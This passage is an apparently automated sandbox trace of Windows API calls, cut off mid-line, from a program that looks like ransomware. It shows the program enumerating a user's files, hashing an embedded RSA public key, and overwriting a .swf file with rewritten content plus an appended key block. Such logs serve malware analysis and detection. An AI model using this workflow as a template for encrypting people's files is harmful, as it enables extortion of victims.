ftCreationTime.dwHighDateTime=0x1d5c23f, ftLastAccessTime.dwLowDateTime=0x4cc1e0f0, ftLastAccessTime.dwHighDateTime=0x1d5b624, ftLastWriteTime.dwLowDateTime=0x4cc1e0f0, ftLastWriteTime.dwHighDateTime=0x1d5b624, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbe5f0b0, ftCreationTime.dwHighDateTime=0x1d5bac2, ftLastAccessTime.dwLowDateTime=0x437ebf00, ftLastAccessTime.dwHighDateTime=0x1d5b8bc, ftLastWriteTime.dwLowDateTime=0x437ebf00, ftLastWriteTime.dwHighDateTime=0x1d5b8bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FVtB8RwkjP B1jt", cAlternateFileName="FVTB8R~1")) returned 1 [0240.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0240.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393e80 [0240.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0240.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0240.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe12645b0, ftCreationTime.dwHighDateTime=0x1d5c1b9, ftLastAccessTime.dwLowDateTime=0x6360c080, ftLastAccessTime.dwHighDateTime=0x1d5bd0c, ftLastWriteTime.dwLowDateTime=0x6360c080, ftLastWriteTime.dwHighDateTime=0x1d5bd0c, nFileSizeHigh=0x0, nFileSizeLow=0x17c70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oi-u2UZqt.swf", cAlternateFileName="OI-U2U~1.SWF")) returned 1 [0240.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0240.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.793] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\oi-u2UZqt.swf") returned=".swf" [0240.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\oi-u2UZqt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\oi-u2uzqt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.794] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=97392) returned 1 [0240.794] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.796] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17c4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.796] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.798] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.798] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x17c70, lpOverlapped=0x0) returned 1 [0240.799] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.800] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.800] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.800] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.801] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.801] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.801] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.801] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.801] GetLastError () returned 0x0 [0240.801] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.801] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.801] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.801] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.801] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17c70) returned 0x3b95d50 [0240.802] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0240.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0240.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0240.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f850 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f898 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ef8 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0240.803] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ef8 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88ee0 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0240.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.804] GetCurrentThreadId () returned 0x5b4 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b89ce8 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0240.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.805] GetCurrentThreadId () returned 0x5b4 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ef8 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ec8 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f58 [0240.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f28 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f70 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f10 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ee0 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0240.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0240.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f898 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0240.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0240.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.810] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x17c6b, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x17c6b, lpOverlapped=0x0) returned 1 [0240.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0240.810] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17c70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.810] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0240.811] RtlAllocateHeap 